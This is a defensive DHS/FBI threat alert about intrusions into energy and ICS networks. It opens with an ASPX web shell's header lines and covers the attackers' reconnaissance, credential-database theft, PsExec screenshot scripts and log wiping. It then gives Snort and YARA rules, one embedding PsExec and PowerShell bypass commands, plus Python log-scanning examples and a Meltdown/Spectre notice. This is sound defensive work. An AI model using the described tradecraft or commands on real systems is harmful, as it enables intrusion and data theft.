<%@ import Namespace="System.Runtime.InteropServices"%>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ Import Namespace="System.Threading"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<%@ import Namespace="Microsoft.VisualBasic"%>
<%@ Import Namespace="System.IO.Compression" %>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat = "server">
public string Password = "<REDACTED>";
public string z_progname = "z_WebShell";
…
________________________________________

Stage 7: Actions on Objectives

DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA).
The threat actors used the infrastructure of staging targets to connect to several intended targets.

Internal Reconnaissance

Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. DHS observed the threat actors focusing on identifying and browsing file servers within the intended victim's network.

Once on the intended target's network, the threat actors used privileged credentials to access the victim's domain controller, typically via RDP. Once on the domain controller, the threat actors used the batch scripts "dc.bat" and "dit.bat" to enumerate hosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts were:
- admins.txt
- completed_dclist.txt
- completed_trusts.txt
- completed_zone.txt
- comps.txt
- conditional_forwarders.txt
- domain_zone.txt
- enum_zones.txt
- users.txt

The threat actors also collected the files "ntds.dit" and the "SYSTEM" registry hive. DHS observed the threat actors compress all of these files into archives named "SYSTEM.zip" and "comps.zip".

The threat actors used Windows' scheduled task and batch scripts to execute "scr.exe" and collect additional information from hosts on the network. The tool "scr.exe" is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of "scr.exe" matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report.

In at least two instances, the threat actors used batch scripts labeled "pss.bat" and "psc.bat" to run the PsExec tool. Additionally, the threat actors would rename the tool PsExec to "ps.exe".
- The batch script ("pss.bat" or "psc.bat") is executed with domain administrator credentials.
- The directory "out" is created in the user's %AppData% folder.
- PsExec is used to execute "scr.exe" across the network and to collect screenshots of systems in "ip.txt".
- The screenshot's filename is labeled based on the computer name of the host and stored in the target's C:\Windows\Temp directory with a ".jpg" extension.
- The screenshot is then copied over to the newly created "out" directory of the system where the batch script was executed.
- In one instance, DHS observed an "out.zip" file created.

DHS observed the threat actors create and modify a text document labeled "ip.txt" which is believed to have contained a list of host information. The threat actors used "ip.txt" as a source of hosts to perform additional reconnaissance efforts. In addition, the text documents "res.txt" and "err.txt" were observed being created as a result of the batch scripts being executed. In one instance, "res.txt" contained output from the Windows command "query user" across the network.

Using <Username> <Password>
Running -s cmd /c query user on <Hostname1>
Running -s cmd /c query user on <Hostname2>
Running -s cmd /c query user on <Hostname3>
USERNAME    SESSIONNAME    ID    STATE    IDLE TIME    LOGON TIME
<user1>                    2     Disc     1+19:34      6/27/2017 12:35 PM

An additional batch script named "dirsb.bat" was used to gather folder and file names from hosts on the network.

In addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with "scr.exe". In two instances, the scheduled tasks were designed to run the command "C:\Windows\Temp\scr.exe" with the argument "C:\Windows\Temp\scr.jpg". In another instance, the scheduled task was designed to run with the argument "pss.bat" from the local administrator's "AppData\Local\Microsoft\" folder.

The threat actors commonly executed files out of various directories within the user's AppData or Downloads folder. Some common directory names were
- Chromex64,
- Microsoft_Corporation,
- NT,
- Office365,
- Temp, and
- Update.

Targeting of ICS and SCADA Infrastructure

In multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were named containing ICS vendor names and ICS reference documents pertaining to the organization (e.g., "SCADA WIRING DIAGRAM.pdf" or "SCADA PANEL LAYOUTS.xlsx").

The threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS observed the threat actors copying Virtual Network Computing (VNC) profiles that contained configuration information on accessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the threat actors accessed.

Cleanup and Cover Tracks

In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.

Threat actors cleaned up intended target networks by deleting created screenshots and specific registry keys. Through forensic analysis, DHS determined that the threat actors deleted the registry key associated with the terminal server client that tracks connections made to remote systems. The threat actors also deleted all batch scripts, output text documents and any tools they brought into the environment such as "scr.exe".

Detection and Response

IOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlists to determine whether malicious activity has been observed within their organization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these threat actors.

Network Signatures and Host-Based Rules

This section contains network signatures and host-based rules that can be used to detect malicious activity associated with threat actor TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting process, the possibility of false positives always remains.
Network Signatures

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)"; sid:42000000; rev:1; flow:established,to_server; content:"/aspnet_client/system_web/4_0_30319/update/"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/img/bson021.dat'"; sid:42000001; rev:1; flow:established,to_server; content:"/img/bson021.dat"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/A56WY' (Callback)"; sid:42000002; rev:1; flow:established,to_server; content:"/A56WY"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any 445 (msg:"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)"; sid:42000003; rev:1; flow:established,to_server; content:"|FF|SMB|75 00 00 00 00|"; offset:4; depth:9; content:"|08 00 01 00|"; distance:3; content:"|00 5c 5c|"; distance:2; within:3; content:"|5c|AME_ICON.PNG"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)"; sid:42000004; rev:1; flow:established,to_server; content:"/ame_icon.png"; http_uri; fast_pattern:only; content:"OPTIONS"; nocase; http_method; classtype:bad-unknown; metadata:service http;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'"; sid:42000005; rev:1; flow:established,to_server; content:"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip"; http_header; fast_pattern:only; pcre:"/\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&/U"; classtype:bad-unknown; metadata:service http;)

alert tcp $EXTERNAL_NET [139,445] -> $HOME_NET any (msg:"SMB Server Traffic contains NTLM-Authenticated SMBv1 Session"; sid:42000006; rev:1; flow:established,to_client; content:"|ff 53 4d 42 72 00 00 00 00 80|"; fast_pattern:only; content:"|05 00|"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)

YARA Rules

/*
This is a consolidated rule set for malware associated with this activity. These rules were written by NCCIC and include contributions from trusted partners.
*/

rule APT_malware_1
{
    meta:
        description = "inveigh pen testing tools & related artifacts"
        author = "DHS | NCCIC Code Analysis Team"
        date = "2017/07/17"
        hash0 = "61C909D2F625223DB2FB858BBDF42A76"
        hash1 = "A07AA521E7CAFB360294E56969EDA5D6"
        hash2 = "BA756DD64C1147515BA2298B6A760260"
        hash3 = "8943E71A8C73B5E343AA9D2E19002373"
        hash4 = "04738CA02F59A5CD394998A99FCD9613"
        hash5 = "038A97B4E2F37F34B255F0643E49FC9D"
        hash6 = "65A1A73253F04354886F375B59550B46"
        hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"
        hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"
        hash9 = "722154A36F32BA10E98020A8AD758A7A"
        hash10 = "4595DBE00A538DF127E0079294C87DA0"
    strings:
        $s0 = "file://"
        $s1 = "/ame_icon.png"
        $s2 = "184.154.150.66"
        $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }
        $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }
        $s5 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])"
        $s6 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"
        $s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE="
        $s8 = "NlZzSZk="
        $s9 = "WlJTb1q5kaxqZaRnser3sw=="
        $s10 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"
        $s11 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])"
        $s12 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat"
        $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }
        $s14 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }
        $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }
        //inveigh pentesting tools
        $s16 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }
        //specific malicious word document PK archive
        $s17 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }
        $s18 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }
        $s19 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }
        $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
        $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
        $s22 = "5.153.58.45"
        $s23 = "62.8.193.206"
        $s24 = "/1/ree_stat/p"
        $s25 = "/icon.png"
        $s26 = "/pshare1/icon"
        $s27 = "/notepad.png"
        $s28 = "/pic.png"
        $s29 = "http://bit.ly/2m0x8IH"
    condition:
        ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)
}

rule APT_malware_2
{
    meta:
        description = "rule detects malware"
        author = "other"
    strings:
        $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }
        $http_push = "X-mode: push" nocase
        $http_pop = "X-mode: pop" nocase
    condition:
        any of them
}

rule Query_XML_Code_MAL_DOC_PT_2
{
    meta:
        name = "Query_XML_Code_MAL_DOC_PT_2"
        author = "other"
    strings:
        $zip_magic = { 50 4b 03 04 }
        $dir1 = "word/_rels/settings.xml.rels"
        $bytes = { 8c 90 cd 4e eb 30 10 85 d7 }
    condition:
        $zip_magic at 0 and $dir1 and $bytes
}

rule Query_Javascript_Decode_Function
{
    meta:
        name = "Query_Javascript_Decode_Function"
        author = "other"
    strings:
        $decode1 = { 72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B }
        $decode2 = { 22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29 }
        $decode3 = { 3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 }
        $decode4 = { 73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29 }
        $func_call = "a(\""
    condition:
        filesize < 20KB and #func_call > 20 and all of ($decode*)
}

rule Query_XML_Code_MAL_DOC
{
    meta:
        name = "Query_XML_Code_MAL_DOC"
        author = "other"
    strings:
        $zip_magic = { 50 4b 03 04 }
        $dir = "word/_rels/" ascii
        $dir2 = "word/theme/theme1.xml" ascii
        $style = "word/styles.xml" ascii
    condition:
        $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd
}

rule z_webshell
{
    meta:
        description = "Detection for the z_webshell"
        author = "DHS NCCIC Hunt and Incident Response Team"
        date = "2018/01/25"
        md5 = "2C9095C965A55EFC46E16B86F9B7D6C6"
    strings:
        $aspx_identifier1 = "<%@ " nocase ascii wide
        $aspx_identifier2 = "<asp:" nocase ascii wide
        $script_import = /(import|assembly) Name(space)?\=\"(System|Microsoft)/ nocase ascii wide
        $case_string = /case \"z_(dir|file|FM|sql)_/ nocase ascii wide
        $webshell_name = "public string z_progname =" nocase ascii wide
        $webshell_password = "public string Password =" nocase ascii wide
    condition:
        1 of ($aspx_identifier*) and #script_import > 10 and #case_string > 7 and 2 of ($webshell_*) and filesize < 100KB
}
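The HTTP signatures above (sids 42000000 through 42000005) can also be applied after the fact to proxy logs when no inline sensor saw the traffic. The following Python is an added example, not part of this alert or its IOC package: it restates those signatures as checks over a constructed, simplified proxy log format. The field layout, function names, and the sample client and server addresses are assumptions for illustration; the URIs, User-Agent string and query pattern are taken from the signatures.

```python
import re
import shlex
from urllib.parse import urlsplit

# Indicators taken from the Snort signatures above (sids 42000000-42000005),
# expressed as checks over proxy log fields. The field layout used here is a
# constructed, simplified format; adapt the parser to your proxy's own schema.
URI_INDICATORS = {
    "/aspnet_client/system_web/4_0_30319/update/": "beacon URI (sid 42000000)",
    "/img/bson021.dat": "URI indicator (sid 42000001)",
    "/A56WY": "callback URI (sid 42000002)",
}
SMB_HARVEST_URI = "/ame_icon.png"      # sid 42000004 requires the OPTIONS method
GO_USER_AGENT = "Go-http-client/1.1"   # sid 42000005 pairs this UA with the query shape below
GO_QUERY_RE = re.compile(r"\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&")


def classify_request(method, url, user_agent):
    """Return the indicator labels matched by a single proxied request."""
    parts = urlsplit(url)
    # Snort's http_uri buffer covers path plus query string; mirror that here.
    uri = parts.path + ("?" + parts.query if parts.query else "")
    hits = []
    for needle, label in URI_INDICATORS.items():
        if needle in uri:  # content: matches anywhere in the URI
            hits.append(label)
    if method.upper() == "OPTIONS" and SMB_HARVEST_URI in uri:
        hits.append("OPTIONS request for ame_icon.png, SMB credential harvesting (sid 42000004)")
    # The Snort rule also requires an Accept-Encoding: gzip header, which proxy
    # logs rarely keep, so this host-side version is slightly looser.
    if GO_USER_AGENT in user_agent and GO_QUERY_RE.search(uri):
        hits.append("Go-http-client UA with tokenized query (sid 42000005)")
    return hits


def scan_proxy_log(text):
    """Parse lines of '<time> <client> <method> <url> <status> "<user-agent>"' and
    return (client, url, [indicators]) for each request matching at least one."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = shlex.split(line)  # keeps the quoted User-Agent as one field
        if len(fields) < 6:
            continue
        _time, client, method, url, _status, user_agent = fields[:6]
        hits = classify_request(method, url, user_agent)
        if hits:
            findings.append((client, url, hits))
    return findings


# Constructed sample log lines (RFC 5737 test addresses, .invalid hostnames).
SAMPLE_PROXY_LOG = """
# time client method url status "user-agent"
2018-03-01T09:15:02Z 10.20.30.40 GET http://203.0.113.10/aspnet_client/system_web/4_0_30319/update/ 200 "Mozilla/5.0 (Windows NT 10.0)"
2018-03-01T09:16:10Z 10.20.30.41 GET http://intranet.example.invalid/img/logo.png 200 "Mozilla/5.0 (Windows NT 10.0)"
2018-03-01T09:17:45Z 10.20.30.42 OPTIONS http://203.0.113.11/ame_icon.png 200 "Microsoft-WebDAV-MiniRedir/10.0.16299"
2018-03-01T09:18:03Z 10.20.30.43 GET http://203.0.113.12/update/info.aspx?abc=0123456789abcdef0123456789abcdef&x=1 200 "Go-http-client/1.1"
2018-03-01T09:18:20Z 10.20.30.44 GET http://198.51.100.7/status.txt?abc=0123456789abcdef0123456789abcdef&x=1 200 "Mozilla/5.0 (Windows NT 10.0)"
"""

if __name__ == "__main__":
    for client, url, hits in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} {url}")
        for hit in hits:
            print(f"    {hit}")
```

The last sample line shows why the signature ties the query shape to the User-Agent: the tokenized query alone is not flagged, which keeps ordinary traffic with similar parameters out of the results.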
Impact
These actors’ campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors.
Solution
DHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help defend against this activity.

Network and Host-based Signatures
DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious activity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated YARA and .txt file to identify malicious activity.

Detections and Prevention Measures
Users and administrators may detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the IOC packages to the following locations:
- network intrusion detection system/network intrusion protection system logs,
- web content logs,
- proxy server logs,
- domain name server resolution logs,
- packet capture (PCAP) repositories,
- firewall logs,
- workstation Internet browsing history logs,
- host-based intrusion detection system/host-based intrusion prevention system (HIPS) logs,
- data loss prevention logs,
- exchange server logs,
- user mailboxes,
- mail filter logs,
- mail content logs,
- AV mail logs,
- OWA logs,
- Blackberry Enterprise Server logs, and
- Mobile Device Management logs.

To detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes listed in the IOC packages with the following locations:
- application logs,
- IIS/Apache logs,
- file system,
- intrusion detection system/intrusion prevention system logs,
- PCAP repositories,
- firewall logs, and
- reverse proxy.

- Detect spear-phishing by searching workstation file systems and network-based user directories for attachment filenames and hashes found in the IOC packages.
- Detect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.
- Detect evasion techniques by the actors by identifying deleted logs. This can be done by reviewing last-seen entries and by searching for event 104 on Windows system logs.
- Detect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially those created recently.
- Detect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for all users. Any unusual login times should be reviewed by the account owners.
- Detect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s credentials suspected to be compromised.
- Detect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.
- Detect spear-phishing through a network by validating all new email accounts created on mail servers, especially those with external user access.
- Detect persistence on servers by searching system logs for all filenames listed in the IOC packages.
- Detect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1” contained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior to the activity.)
- Detect persistence by reviewing all installed applications on critical systems for unauthorized applications, specifically note FortiClient VPN and Python 2.7.
- Detect persistence by searching for the value of “REG_DWORD 100” at registry location “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\MaxInstanceCount” and the value of “REG_DWORD 1” at location “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\dontdisplaylastusername”.
- Detect installation by searching all proxy logs for downloads from URIs without domain names.
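Two of the host checks listed above (the cleared-log event 104 and the two registry values) lend themselves to offline review of exported artifacts collected from many machines. The following Python is an added example, not part of this alert: it parses a `reg export` text file for the two REG_DWORD values named above and a System log saved as CSV for event 104. Both sample inputs are constructed for illustration, the CSV column layout approximates an Event Viewer export, and the function names are this example's own.

```python
import csv
import io
import re

# Values the alert lists as persistence indicators: REG_DWORD 100 and REG_DWORD 1.
WATCHED_VALUES = [
    (r"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services", "MaxInstanceCount", 100),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", "dontdisplaylastusername", 1),
]

_KEY_RE = re.compile(r"^\[(.+)\]$")
_DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def _normalize_key(key):
    # `reg export` writes the long hive name; the alert uses the HKLM abbreviation.
    key = key.strip().rstrip("\\")
    if key.upper().startswith("HKEY_LOCAL_MACHINE"):
        key = "HKLM" + key[len("HKEY_LOCAL_MACHINE"):]
    return key.lower()


def parse_reg_export(text):
    """Map (normalized key, value name) -> int for every REG_DWORD in a .reg export."""
    values = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = _normalize_key(m.group(1))
            continue
        m = _DWORD_RE.match(line)
        if m and current is not None:
            values[(current, m.group(1).lower())] = int(m.group(2), 16)
    return values


def check_persistence_values(values):
    """Return (key, name, value) for each watched value present with the flagged data."""
    findings = []
    for key, name, expected in WATCHED_VALUES:
        found = values.get((key.lower(), name.lower()))
        if found == expected:
            findings.append((key, name, found))
    return findings


LOG_CLEARED_EVENT_ID = 104  # Microsoft-Windows-Eventlog: "The <log> log file was cleared."


def find_log_cleared_events(csv_text):
    """Return rows of a System log CSV export whose Event ID is 104, in export order."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        try:
            event_id = int(row["Event ID"])
        except (KeyError, ValueError):
            continue
        if event_id == LOG_CLEARED_EVENT_ID:
            hits.append({"time": row["Date and Time"], "event_id": event_id,
                         "source": row["Source"], "message": row["Message"]})
    return hits


# Constructed sample of a `reg export` file; a real export holds many more keys.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services]
"MaxInstanceCount"=dword:00000064

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"dontdisplaylastusername"=dword:00000001
"EnableLUA"=dword:00000001
"""

# Constructed sample of a System log saved as CSV (column names follow Event Viewer).
SAMPLE_SYSTEM_LOG_CSV = """Level,Date and Time,Source,Event ID,Task Category,Message
Information,6/27/2017 1:02:11 PM,Microsoft-Windows-Eventlog,104,Log clear,The System log file was cleared.
Information,6/27/2017 1:02:40 PM,Service Control Manager,7036,None,The Windows Update service entered the running state.
Information,6/27/2017 1:05:09 PM,Microsoft-Windows-Eventlog,104,Log clear,The Application log file was cleared.
"""

if __name__ == "__main__":
    for key, name, value in check_persistence_values(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"registry: {key}\\{name} = {value}")
    for event in find_log_cleared_events(SAMPLE_SYSTEM_LOG_CSV):
        print(f"event {event['event_id']} at {event['time']}: {event['message']}")
```

Because the actors cleared logs before leaving, a positive hit on event 104 is itself the finding: it marks the time window after which the local System log can no longer be trusted and centrally forwarded copies must be consulted instead.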
General Best Practices Applicable to this Campaign:
- Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.
- Block the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the network.
- Monitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple concurrent logins).
- Deploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources, and addresses; block these before receiving and downloading messages. This action will help to reduce the attack surface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at the mail gateway) with a reputable anti-virus solution that includes cloud reputation services.
- Segment any critical networks or control systems from business systems and networks according to industry best practices.
- Ensure adequate logging and visibility on ingress and egress points.
- Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.
- Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.
- Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis, and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.
- Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.
- Block RDP connections originating from untrusted external addresses unless an exception exists; routinely review exceptions for validity.
- Store system logs of mission critical systems for at least one year within a security information event management tool.
- Ensure applications are configured to log the proper level of detail for an incident response investigation.
- Consider implementing HIPS or other controls to prevent unauthorized code execution.
- Establish least-privilege controls.
- Reduce the number of Active Directory domain and enterprise administrator accounts.
- Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.
- Establish a password policy to require complex passwords for all users.
- Ensure that accounts for network administration do not have external connectivity.
- Ensure that network administrators use non-privileged accounts for email and Internet access.
- Use two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and high-risk environments (e.g., remote access, privileged access, and access to sensitive data).
- Implement a process for logging and auditing activities conducted by privileged accounts.
- Enable logging and alerting on privilege escalations and role changes.
- Periodically conduct searches of publicly available information to ensure no sensitive information has been disclosed. Review photographs and documents for sensitive data that may have inadvertently been included.
- Assign sufficient personnel to review logs, including records of alerts.
- Complete independent security (as opposed to compliance) risk review.
- Create and participate in information sharing programs.
- Create and maintain network and system documentation to aid in timely incident response. Documentation should include network diagrams, asset owners, type of asset, and an incident response plan.

Report Notice
DHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to DHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at NCCICcustomerservice@hq.dhs.gov or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).
Revision History
March 15, 2018: Initial Version
This product is provided subject to this Notification and this Privacy & Use policy.
Full report - 01/04/18 TA18-004A: Meltdown and Spectre Side-Channel Vulnerability Guidance
Original release date: January 04, 2018 | Last revised: February 10, 2018
Systems Affected
CPU hardware implementations
Overview
On January 3, 2018, the National Cybersecurity and Communications Integration Center (NCCIC) became aware of a set of security vulnerabilities—known as Meltdown and Spectre—that affect modern computer processors. These vulnerabilities can be exploited to steal sensitive data present in a computer system's memory.
Description
CPU hardware implementations are vulnerable to side-channel attacks, referred to as Meltdown and Spectre. Meltdown is a bug that "melts" the security boundaries normally enforced by the hardware, affecting desktops, laptops, and cloud computers. Spectre is a flaw an attacker can exploit to force a program to reveal its data. The name derives from "speculative execution", an optimization in which a processor executes instructions ahead of time, before it is known whether they are needed, to avoid a delay when they are actually required. Spectre affects almost all devices including desktops, laptops, cloud servers, and smartphones.

More details of these attacks can be found here:

Common Vulnerability and Exposure (CVE):
- Rogue Data Cache Load: CVE-2017-5754 (Meltdown) https://nvd.nist.gov/vuln/detail/CVE-2017-5754
- Bounds Check Bypass: CVE-2017-5753 (Spectre) https://nvd.nist.gov/vuln/detail/CVE-2017-5753
- Branch Target Injection: CVE-2017-5715 (Spectre) https://nvd.nist.gov/vuln/detail/CVE-2017-5715

CERT/CC’s Vulnerability Note VU#584653
Impact
An attacker can gain access to the system by establishing command and control presence on a machine via malicious JavaScript, malvertising, or phishing. Once successful, the attacker could escalate privileges to exploit Meltdown and Spectre vulnerabilities, revealing sensitive information from a computer’s kernel memory, including keystrokes, passwords, encryption keys, and other valuable information.
Solution
Mitigation
NCCIC encourages users and administrators to refer to their hardware and software vendors for the most recent information. In the case of Spectre, the vulnerability exists in CPU architecture rather than in software, and is not easily patched; however, this vulnerability is more difficult to exploit. After patching, performance impacts may vary, depending on use cases. NCCIC recommends administrators ensure that performance is monitored for critical applications and services, and work with their vendor(s) and service provider(s) to mitigate the effect, if possible.

Additionally, NCCIC recommends users and administrators who rely on cloud infrastructure work with their CSP to mitigate and resolve any impacts resulting from host OS patching and mandatory rebooting.

